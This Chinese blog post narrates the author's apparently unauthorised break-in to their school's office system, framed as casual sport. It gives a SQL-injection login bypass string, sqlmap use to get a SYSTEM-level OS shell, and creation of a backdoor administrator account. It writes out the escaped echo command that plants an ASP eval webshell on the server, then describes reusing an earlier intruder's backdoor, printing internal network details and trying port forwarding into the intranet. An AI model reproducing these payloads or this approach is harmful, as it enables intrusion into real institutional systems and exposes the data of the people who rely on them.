Back
Featured image of post PWN学校OA系统:从sql注入到getshell到放弃

PWN学校OA系统:从sql注入到getshell到放弃

我们学校的教务系统用的是这样一个CMS:

这里有SQL注入,直接输入'or 1=1--就可以进入

进去后是这样,有个公文列表;发布公文处可以上传附件;同时发现设置里面可以上传改图片:

经过尝试,设置里面的上传会自动重命名,不能传shell;公文列表里面上传的附件会调用一个download程序下载,不知道真实路径没法直接访问;然后发现浏览公文的地方有SQL数字型注入:

在这里还获得疑似物理路径,留着备用

伴随cookie,放到sqlmap里面,是sa权限,返回os-shell。whoami发现是system权限。所以我先加了个叫mssql2的管理员用户备用

通过百度知道了解cmd下输出一句话需要转移,于是命令这样:

echo ^<^%eval request^(chr^(35^)^)^%^> >D:\人名\某某学校办公系统\BZOA\3.asp

结果输出后shell访问不到,于是用dir一个个去遍历目录,最后确定目录其实是E:\xxxx\BZOA\,不知道为什么和mssql显错的不一样。

用asp菜刀可以遍历全盘文件,但不管怎样上传大马都是失败,不知道是不是权限太小了。准备写入aspx一句话,发现在tools1目录下有前人留下的aspx后门

下载后门读出密码,访问进去

执行必要的命令:

Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:82             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       448
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1564
  TCP    10.1.49.21:82          117.25.58.21:6580      CLOSE_WAIT      4
  TCP    10.1.49.21:82          117.25.58.21:7710      ESTABLISHED     4
  TCP    10.1.49.21:139         0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING       1708
  TCP    127.0.0.1:30606        0.0.0.0:0              LISTENING       908
  UDP    0.0.0.0:445            *:*                                    4
  UDP    10.1.49.21:137         *:*                                    4
  UDP    10.1.49.21:138         *:*                                    4
  
  Connection-specific DNS Suffix  . : 

   IP Address. . . . . . . . . . . . : 10.1.49.21

   Subnet Mask . . . . . . . . . . . : 255.255.255.128

   Default Gateway . . . . . . . . . : 10.1.49.126

有开3389,但是是内网。大概内网是很多台服务器却只有一个IP地址,就把这些服务器上面的端口映射到管理公网IP地址的那台服务器上吧。

用aspx上传lcx失败,改名上传还是失败,上传asp文件却可以。本来想用命令行+ftp的方式远程下载lcx,但是又发现前人在根目录留了一个1lcx.exe于是就使用之。


不知道是不是机子太老了,运行任何exe程序都没效果,整个网站也无法访问了…

最后贴一下其他收集到的信息(顺便吐槽):

又发现前人的痕迹,想必已经千疮百孔了。。

根目录开发文档.txt直接告诉你mssql的连接信息(可惜在内网)

Licensed under CC BY-NC-SA 4.0
-1